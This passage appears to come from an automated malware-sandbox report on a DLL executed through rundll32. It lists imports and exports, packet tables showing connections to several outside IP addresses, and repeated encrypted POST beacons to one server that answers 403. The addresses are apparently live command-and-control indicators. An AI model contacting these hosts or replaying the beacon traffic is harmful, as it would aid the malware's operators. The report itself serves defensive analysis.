                                                                                                              KERNEL32.dllGetCurrentDirectoryA, GetTempPathA, GetWindowsDirectoryA, VirtualProtectEx, FindFirstChangeNotificationA, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, ExitProcess, GetStdHandle, GetFileType, WriteFile, OutputDebugStringA, OutputDebugStringW, WriteConsoleW, CloseHandle, WaitForSingleObjectEx, CreateThread, SetConsoleCtrlHandler, GetCurrentThread, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, GetACP, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindFirstFileExW, FindNextFileA, FindNextFileW, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, SetStdHandle, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW

                                                                                                              Exports

                                                                                                              NameOrdinalAddress
                                                                                                              Bluewing10x49eed0
                                                                                                              Earth20x49efd0
                                                                                                              Masterjust30x49eb20

                                                                                                              Network Behavior

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Oct 28, 2021 04:48:57.913712025 CEST49779443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:48:57.913773060 CEST44349779192.46.210.220192.168.2.4
                                                                                                              Oct 28, 2021 04:48:57.913930893 CEST49779443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:48:57.941133022 CEST49779443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:48:57.941168070 CEST44349779192.46.210.220192.168.2.4
                                                                                                              Oct 28, 2021 04:48:58.481046915 CEST44349779192.46.210.220192.168.2.4
                                                                                                              Oct 28, 2021 04:48:58.481211901 CEST49779443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:48:58.745454073 CEST49779443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:48:58.745502949 CEST44349779192.46.210.220192.168.2.4
                                                                                                              Oct 28, 2021 04:48:58.745940924 CEST44349779192.46.210.220192.168.2.4
                                                                                                              Oct 28, 2021 04:48:58.746040106 CEST49779443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:48:58.748334885 CEST49779443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:48:58.748435020 CEST49779443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:48:58.748492002 CEST44349779192.46.210.220192.168.2.4
                                                                                                              Oct 28, 2021 04:48:59.440316916 CEST44349779192.46.210.220192.168.2.4
                                                                                                              Oct 28, 2021 04:48:59.440388918 CEST49779443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:48:59.440401077 CEST44349779192.46.210.220192.168.2.4
                                                                                                              Oct 28, 2021 04:48:59.440452099 CEST49779443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:48:59.448964119 CEST49779443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:48:59.448982954 CEST44349779192.46.210.220192.168.2.4
                                                                                                              Oct 28, 2021 04:48:59.608078003 CEST49782808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:48:59.784281015 CEST80849782143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:48:59.784389019 CEST49782808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:48:59.785304070 CEST49782808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:48:59.957874060 CEST80849782143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:48:59.959424973 CEST80849782143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:48:59.959527016 CEST49782808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:49:00.167416096 CEST49783443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:49:00.167483091 CEST44349783192.46.210.220192.168.2.4
                                                                                                              Oct 28, 2021 04:49:00.167594910 CEST49783443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:49:00.229356050 CEST49783443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:49:00.229425907 CEST44349783192.46.210.220192.168.2.4
                                                                                                              Oct 28, 2021 04:49:00.717951059 CEST44349783192.46.210.220192.168.2.4
                                                                                                              Oct 28, 2021 04:49:00.718132019 CEST49783443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:49:00.977408886 CEST49783443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:49:00.977462053 CEST44349783192.46.210.220192.168.2.4
                                                                                                              Oct 28, 2021 04:49:00.977756977 CEST44349783192.46.210.220192.168.2.4
                                                                                                              Oct 28, 2021 04:49:00.977890015 CEST49783443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:49:00.980914116 CEST49783443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:49:00.981034994 CEST49783443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:49:00.981097937 CEST44349783192.46.210.220192.168.2.4
                                                                                                              Oct 28, 2021 04:49:01.666161060 CEST44349783192.46.210.220192.168.2.4
                                                                                                              Oct 28, 2021 04:49:01.666281939 CEST49783443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:49:01.666294098 CEST44349783192.46.210.220192.168.2.4
                                                                                                              Oct 28, 2021 04:49:01.666398048 CEST49783443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:49:01.668618917 CEST49783443192.168.2.4192.46.210.220
                                                                                                              Oct 28, 2021 04:49:01.668646097 CEST44349783192.46.210.220192.168.2.4
                                                                                                              Oct 28, 2021 04:49:01.809447050 CEST49787808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:49:01.929413080 CEST49782808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:49:01.969050884 CEST80849787143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:01.969629049 CEST49787808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:49:01.970108032 CEST49787808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:49:02.102039099 CEST80849782143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:02.102446079 CEST80849782143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:02.102664948 CEST49782808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:49:02.103492975 CEST49782808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:49:02.103729010 CEST49782808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:49:02.129513025 CEST80849787143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:02.130954027 CEST80849787143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:02.131690979 CEST49787808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:49:02.276004076 CEST80849782143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:02.276180029 CEST80849782143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:02.276220083 CEST80849782143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:02.276258945 CEST80849782143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:02.276297092 CEST80849782143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:02.320259094 CEST49787808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:49:02.479767084 CEST80849787143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:02.480298042 CEST80849787143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:02.480587959 CEST49787808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:49:02.481197119 CEST49787808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:49:02.481297970 CEST49787808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:49:02.640691042 CEST80849787143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:02.640749931 CEST80849787143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:02.640788078 CEST80849787143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:02.640824080 CEST80849787143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:02.660959005 CEST80849782143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:02.661020041 CEST80849782143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:02.661133051 CEST49782808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:49:02.661194086 CEST49782808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:49:02.668499947 CEST49782808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:49:02.841324091 CEST80849782143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:02.952397108 CEST497886891192.168.2.445.77.0.96
                                                                                                              Oct 28, 2021 04:49:03.030786037 CEST80849787143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:03.030828953 CEST80849787143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:03.030924082 CEST49787808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:49:03.034585953 CEST49787808192.168.2.4143.244.140.214
                                                                                                              Oct 28, 2021 04:49:03.118685961 CEST68914978845.77.0.96192.168.2.4
                                                                                                              Oct 28, 2021 04:49:03.118832111 CEST497886891192.168.2.445.77.0.96
                                                                                                              Oct 28, 2021 04:49:03.119791031 CEST497886891192.168.2.445.77.0.96
                                                                                                              Oct 28, 2021 04:49:03.150696039 CEST497896891192.168.2.445.77.0.96
                                                                                                              Oct 28, 2021 04:49:03.194067955 CEST80849787143.244.140.214192.168.2.4
                                                                                                              Oct 28, 2021 04:49:03.286705971 CEST68914978845.77.0.96192.168.2.4
                                                                                                              Oct 28, 2021 04:49:03.287811041 CEST68914978845.77.0.96192.168.2.4
                                                                                                              Oct 28, 2021 04:49:03.287962914 CEST497886891192.168.2.445.77.0.96
                                                                                                              Oct 28, 2021 04:49:03.298891068 CEST497886891192.168.2.445.77.0.96
                                                                                                              Oct 28, 2021 04:49:03.316961050 CEST68914978945.77.0.96192.168.2.4
                                                                                                              Oct 28, 2021 04:49:03.317095041 CEST497896891192.168.2.445.77.0.96
                                                                                                              Oct 28, 2021 04:49:03.318057060 CEST497896891192.168.2.445.77.0.96
                                                                                                              Oct 28, 2021 04:49:03.465498924 CEST68914978845.77.0.96192.168.2.4
                                                                                                              Oct 28, 2021 04:49:03.465579033 CEST497886891192.168.2.445.77.0.96

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • 192.46.210.220

                                                                                                              HTTPS Proxied Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              0192.168.2.449779192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:48:58 UTC0OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:48:58 UTC0OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:48:59 UTC4INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:48:59 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              1192.168.2.449783192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:00 UTC4OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:00 UTC5OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:01 UTC9INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:01 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              10192.168.2.449823192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:21 UTC49OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:21 UTC50OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:22 UTC54INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:22 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              11192.168.2.449825192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:22 UTC54OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:22 UTC55OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:23 UTC59INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:23 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              12192.168.2.449832192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:26 UTC59OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:26 UTC60OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:27 UTC69INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:27 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              13192.168.2.449833192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:27 UTC64OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:27 UTC64OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:27 UTC69INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:27 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              14192.168.2.449839192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:30 UTC69OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:30 UTC69OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:31 UTC79INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:31 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              15192.168.2.449841192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:30 UTC74OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:30 UTC74OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:31 UTC79INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:31 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              16192.168.2.449848192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
